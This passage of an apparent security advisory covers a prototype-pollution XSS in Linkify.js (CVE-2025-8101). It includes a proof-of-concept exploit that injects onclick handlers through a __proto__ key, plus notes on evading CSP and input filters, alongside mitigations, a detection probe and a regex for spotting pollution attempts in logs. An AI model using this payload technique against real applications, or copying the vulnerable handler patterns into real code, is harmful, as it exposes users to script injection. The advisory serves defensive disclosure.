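&lt;p&gt;The chain above hinges on a quirk of &lt;code&gt;for...in&lt;/code&gt;: it enumerates inherited enumerable properties, not just own ones. A minimal, library-free sketch of how a polluted prototype leaks into a naive attribute copy:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const attributes = { class: &apos;link-external&apos; };
// Simulate the pollution introduced via options.attributes
Object.setPrototypeOf(attributes, { onclick: &quot;alert(&apos;XSS&apos;)&quot; });

const copied = {};
for (const key in attributes) {
  copied[key] = attributes[key];  // the inherited onclick is copied too
}
// copied now holds both class and onclick
&lt;/code&gt;&lt;/pre&gt;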
&lt;h3&gt;Advanced Exploitation Vectors&lt;/h3&gt;
&lt;h4&gt;Stored XSS via API Endpoints&lt;/h4&gt;
&lt;pre&gt;&lt;code&gt;// Backend API handler (vulnerable)
app.post(&apos;/api/comment&apos;, (req, res) =&amp;gt; {
  const { content } = req.body;
  // Process content with vulnerable Linkify version
  const processed = linkifyHtml(content, req.user.preferences);
  saveToDatabase(processed);  // Stored XSS
});
&lt;/code&gt;&lt;/pre&gt;
&lt;h4&gt;Reflected XSS via URL Parameters&lt;/h4&gt;
&lt;pre&gt;&lt;code&gt;// Client-side rendering (vulnerable)
const params = new URLSearchParams(window.location.search);
const userContent = params.get(&apos;search&apos;);
document.body.innerHTML = linkifyHtml(userContent);
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Bypassing Traditional Protections&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Content Security Policy (CSP)&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Many deployed policies still allow &lt;code&gt;&apos;unsafe-inline&apos;&lt;/code&gt;, which permits inline event handlers&lt;/li&gt;
&lt;li&gt;Even with a strict CSP, &lt;code&gt;javascript:&lt;/code&gt; URIs may still be allowed for navigation&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Input Sanitization&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Most HTML sanitizers don&apos;t catch prototype pollution&lt;/li&gt;
&lt;li&gt;The attack happens at the JavaScript level, not in the HTML&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
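&lt;p&gt;The second point can be demonstrated directly: an object-literal &lt;code&gt;__proto__&lt;/code&gt; key sets the prototype rather than creating an own property, so the payload is invisible to any filter that only inspects serialized input:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const opts = {
  attributes: {
    __proto__: { onclick: &quot;alert(&apos;XSS&apos;)&quot; }
  }
};

// Serialization walks only own enumerable properties,
// so WAF-style inspection of the JSON sees an empty object:
console.log(JSON.stringify(opts));     // {&quot;attributes&quot;:{}}

// ...yet the handler is still reachable via the prototype chain:
console.log(opts.attributes.onclick);  // alert(&apos;XSS&apos;)
&lt;/code&gt;&lt;/pre&gt;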
&lt;h2&gt;Mitigation Strategies&lt;/h2&gt;
&lt;h3&gt;Immediate Actions&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Upgrade to Linkify.js 4.3.2+&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;npm install linkifyjs@latest
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Temporary Workarounds&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Safe wrapper function
function safeLinkify(text, options = {}) {
  // The JSON round-trip serializes only own enumerable properties,
  // dropping anything injected via an inherited __proto__ payload
  const safeOptions = JSON.parse(JSON.stringify(options));
  return linkifyHtml(text, safeOptions);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Secure Implementation Patterns&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Input Validation&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function validateAttributes(attrs) {
  const safeAttrs = {};
  const ALLOWED_ATTRS = [&apos;class&apos;, &apos;target&apos;, &apos;rel&apos;, &apos;title&apos;];
  
  for (const [key, value] of Object.entries(attrs)) {
    if (ALLOWED_ATTRS.includes(key)) {
      safeAttrs[key] = value;
    }
  }
  return safeAttrs;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Deep Object Freezing&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;Object.freeze()&lt;/code&gt; is a powerful JavaScript method that prevents modifications to an object. When applied, it:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Makes the object immutable (can&apos;t add, remove, or modify properties)&lt;/li&gt;
&lt;li&gt;Prevents changes to property descriptors&lt;/li&gt;
&lt;li&gt;Prevents the object&apos;s prototype from being reassigned (the prototype object itself is not frozen)&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;&lt;code&gt;// Basic usage
const config = { apiKey: &apos;123&apos; };
Object.freeze(config);

config.apiKey = &apos;hacked&apos;; // Fails silently in non-strict mode
delete config.apiKey;     // Fails
config.newProp = &apos;test&apos;;  // Fails
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For nested objects, we need a recursive solution:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function deepFreeze(object) {
  // Handle null/undefined and non-objects
  if (object === null || typeof object !== &apos;object&apos;) {
    return object;
  }
  
  // Recursively freeze nested values first
  Object.getOwnPropertyNames(object).forEach(prop =&amp;gt; {
    const value = object[prop];
    // Freeze objects and functions, skipping already frozen ones
    if (!Object.isFrozen(value) &amp;amp;&amp;amp; value instanceof Object) {
      deepFreeze(value);
    }
  });
  
  // Then freeze the object itself
  return Object.freeze(object);
}

// Usage in Linkify.js context
const safeOptions = deepFreeze({
  attributes: {
    // ... your attributes
  }
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This pattern is particularly effective against prototype pollution because:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;It prevents modifications to the prototype chain&lt;/li&gt;
&lt;li&gt;It makes the object&apos;s structure immutable&lt;/li&gt;
&lt;li&gt;It fails loudly in strict mode when someone tries to modify it&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;For more in-depth information, refer to the &lt;a href=&quot;https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/freeze&quot;&gt;MDN documentation on Object.freeze()&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Important Note&lt;/strong&gt;: While &lt;code&gt;Object.freeze()&lt;/code&gt; is powerful, it only provides shallow immutability: nested objects remain fully mutable. Always use deep freezing for complex objects to ensure complete protection.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;Detection &amp;amp; Response&lt;/h2&gt;
&lt;h3&gt;Identifying Vulnerable Implementations&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;// Detection script
const isVulnerable = (() =&amp;gt; {
  try {
    linkifyHtml(&apos;test&apos;, {
      attributes: {
        __proto__: { test: 1 }
      }
    });
    const polluted = ({}).test === 1;
    delete Object.prototype.test;  // clean up the probe
    return polluted;
  } catch (e) {
    return false;
  }
})();
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Log Analysis Patterns&lt;/h3&gt;
&lt;p&gt;Look for suspicious patterns in logs:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Unusual &lt;code&gt;__proto__&lt;/code&gt; properties in attribute objects&lt;/li&gt;
&lt;li&gt;Unexpected event handlers in linkify operations&lt;/li&gt;
&lt;li&gt;Multiple failed attempts with different attribute combinations&lt;/li&gt;
&lt;/ul&gt;
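&lt;p&gt;A naive grep-style heuristic can help surface candidate requests for review (a sketch only: the pattern and function name are illustrative, and string matching is easy to evade, so treat hits as a triage signal rather than a blocklist):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Flags request bodies mentioning common pollution vectors.
const suspicious = /__proto__|constructor\s*[\[.]|prototype\s*[\[.]/;

function flagRequestBody(body) {
  return suspicious.test(body);
}

flagRequestBody(&apos;{&quot;attributes&quot;:{&quot;__proto__&quot;:{}}}&apos;);  // true
flagRequestBody(&apos;{&quot;attributes&quot;:{&quot;class&quot;:&quot;btn&quot;}}&apos;);   // false
&lt;/code&gt;&lt;/pre&gt;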
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;This vulnerability demonstrates the dangers of prototype pollution in JavaScript libraries and the importance of proper input validation. The impact is particularly severe given Linkify.js&apos;s widespread use in content management systems, forums, and social platforms.&lt;/p&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/nfrasser/linkifyjs&quot;&gt;Linkify.js GitHub Repository&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/proto&quot;&gt;MDN: Object.prototype.__proto__&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://portswigger.net/web-security/prototype-pollution&quot;&gt;PortSwigger: Prototype Pollution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2025-8101&quot;&gt;CVE-2025-8101 Details&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://fluidattacks.com/advisories/charly&quot;&gt;Security Advisory&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;hr /&gt;
&lt;p&gt;When Linkify later sets link attributes, it blindly copies all enumerable keys, including inherited ones:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for (const attr in attributes) {
  element.setAttribute(attr, attributes[attr]);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;hr /&gt;
&lt;h2&gt;Exploit PoC&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;import linkifyHtml from &apos;linkify-html&apos;;

const opts = {
  attributes: {
    __proto__: {
      onclick: &quot;alert(&apos;XSS via prototype pollution&apos;)&quot;
    }
  }
};

console.log(
  linkifyHtml(&apos;victim.com&apos;, opts)
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Result: every generated &lt;code&gt;&amp;lt;a&amp;gt;&lt;/code&gt; tag inherits an &lt;code&gt;onclick&lt;/code&gt; handler that fires the XSS payload.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Impact&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Stored/Reflected XSS&lt;/strong&gt; in any app using vulnerable Linkify.js&lt;/li&gt;
&lt;li&gt;Affects all platforms (browser/Node.js)&lt;/li&gt;
&lt;li&gt;CVE reserved: &lt;strong&gt;CVE-2025-8101&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
</content:encoded></item></channel></rss>